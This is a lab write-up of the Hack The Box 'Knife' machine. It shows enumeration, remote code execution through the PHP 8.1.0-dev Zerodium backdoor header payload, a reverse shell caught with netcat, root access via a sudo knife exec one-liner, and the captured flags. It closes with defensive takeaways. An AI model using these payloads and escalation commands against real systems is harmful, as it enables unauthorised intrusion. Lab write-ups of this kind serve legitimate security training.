Knife

Machine Information

Platform: Linux
Difficulty: Easy
IP Address: 10.129.235.78

Initial Enumeration

Nmap Scan

attacker@kali

attacker@kali:~$ nmap -Pn -p- -sC -sV --min-rate 5000 10.129.235.78

Nmap Scan Results

Collapsible Output

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-15 14:09 CDT
Nmap scan report for 10.129.235.78
Host is up (0.0099s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service Enumeration

Web Application

attacker@kali

attacker@kali:~$ whatweb http://knife.htb

WhatWeb Results

$ http://knife.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.235.80], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

The web application appears to be a simple static site with no interactive features, parameters, or links. However, the server is running PHP 8.1.0-dev.

Vulnerability Discovery with Nuclei

attacker@kali

attacker@kali:~$ nuclei -u http://knife.htb

Nuclei Vulnerability Scan

Collapsible Output

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.14

		projectdiscovery.io

[INF] Current nuclei version: v2.9.14 (outdated)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 9149
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1819 (Reduced 1698 Requests)
[apache-detect] [http] [info] http://knife.htb [Apache/2.4.41 (Ubuntu)]
[php-detect] [http] [info] http://knife.htb [8.1.0]
[tech-detect:php] [http] [info] http://knife.htb
[tech-detect:google-font-api] [http] [info] http://knife.htb
[INF] Using Interactsh Server: oast.live
[http-missing-security-headers:permissions-policy] [http] [info] http://knife.htb
[http-missing-security-headers:x-content-type-options] [http] [info] http://knife.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://knife.htb
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://knife.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://knife.htb
[http-missing-security-headers:x-frame-options] [http] [info] http://knife.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://knife.htb
[http-missing-security-headers:referrer-policy] [http] [info] http://knife.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://knife.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://knife.htb
[http-missing-security-headers:strict-transport-security] [http] [info] http://knife.htb
[waf-detect:apachegeneric] [http] [info] http://knife.htb/
[missing-sri] [http] [info] http://knife.htb/
[php-zerodium-backdoor-rce] [http] [critical] http://knife.htb

Critical Vulnerability Detected

Nuclei detected php-zerodium-backdoor-rce, indicating the server is vulnerable to the PHP 8.1.0-dev Zerodium backdoor.

Exploitation

PHP 8.1.0-dev Zerodium Backdoor

In March 2021, the PHP Git repository was compromised in a supply chain attack. Malicious actors inserted a backdoor into the PHP 8.1.0-dev version by modifying the zend_eval_string function to execute arbitrary code when a specific HTTP header (User-Agentt with double ’t’) contains the string zerodiumsystem().

Backdoor Mechanism

The backdoor checks for a User-Agent header ending in zerodiumsystem('COMMAND'); and executes the command within the parentheses.

Example:

User-Agentt: zerodiumsystem('id');

This would execute the id command on the server.

I used a public exploit from GitHub:

attacker@kali

attacker@kali:~$ git clone https://github.com/PenTestical/PHP-8.1.0-dev_RCE cd PHP-8.1.0-dev_RCE chmod +x exploit.sh ./exploit.sh

Exploit Execution

$ PHP 8.1.0-dev - Remote Code Execution Target host IP (e.g. 10.10.10.242): 10.129.235.82 Enter your attacker IP address: 10.10.15.254 Enter your attacker port (4444): 4444 Did you started your reverse shell at port 4444? (Y/N) Y Ok! Done! Reverse shell obtained!

Reverse Shell

In a second terminal, I set up a netcat listener:

attacker@kali

attacker@kali:~$ nc -nvlp 4444

Reverse Shell Connection

$ listening on [any] 4444 ... connect to [10.10.15.254] from (UNKNOWN) [10.129.235.82] 35884 /bin/sh: 0: can't access tty; job control turned off $ whoami james $ ls -la /home/james total 40 drwxr-xr-x 5 james james 4096 May 18 2021 . drwxr-xr-x 3 root root 4096 May 6 2021 .. lrwxrwxrwx 1 james james 9 May 10 2021 .bash_history -> /dev/null -rw-r--r-- 1 james james 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 james james 3771 Feb 25 2020 .bashrc drwx------ 2 james james 4096 May 6 2021 .cache drwxrwxr-x 3 james james 4096 May 6 2021 .local -rw-r--r-- 1 james james 807 Feb 25 2020 .profile -rw-rw-r-- 1 james james 66 May 7 2021 .selected_editor drwx------ 2 james james 4096 May 18 2021 .ssh -r-------- 1 james james 33 Oct 16 20:28 user.txt

USER FLAG HTB

ec24a7387e0cc98c99332edee7ebf065

Post-Exploitation Enumeration

Shell

james@knife sudo -l

Sudo Permissions

$ Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife

The user can run /usr/bin/knife as root without a password.

What is Knife?

Knife is a command-line tool from the Chef configuration management ecosystem. It serves as the primary interface between a local chef-repo and the Chef Infra Server, used in DevOps environments to automate infrastructure provisioning and configuration.

GTFOBins Reference: knife

Privilege Escalation

Knife Exec Command

The knife exec command allows executing Ruby code, which can be abused to spawn a shell:

Shell

james@knife sudo knife exec -E 'exec "/bin/sh"'

Root Shell via Knife Exec

$ $ sudo knife exec -E 'exec "/bin/sh"' whoami root cd /root ls -l total 12 -rwxr-xr-x 1 root root 105 May 8 2021 delete.sh -r-------- 1 root root 33 Oct 16 20:28 root.txt drwxr-xr-x 3 root root 4096 May 6 2021 snap

ROOT FLAG HTB

c19040739347964c0bd63d2598f77706

Loot

No credentials were required for this box - exploitation was achieved through the PHP 8.1.0-dev Zerodium backdoor, and privilege escalation through the knife CLI sudo permission.

Key Takeaways

Supply Chain Attacks can compromise even trusted software repositories - the PHP 8.1.0-dev backdoor is a perfect example
Development versions of software should never be deployed in production environments
The User-Agentt header (with double ’t’) was the trigger for the backdoor - unusual HTTP headers should be monitored
Knife CLI can execute arbitrary Ruby code with knife exec, making it dangerous when run with sudo privileges
Always check for sudo permissions after gaining initial access - they often lead to privilege escalation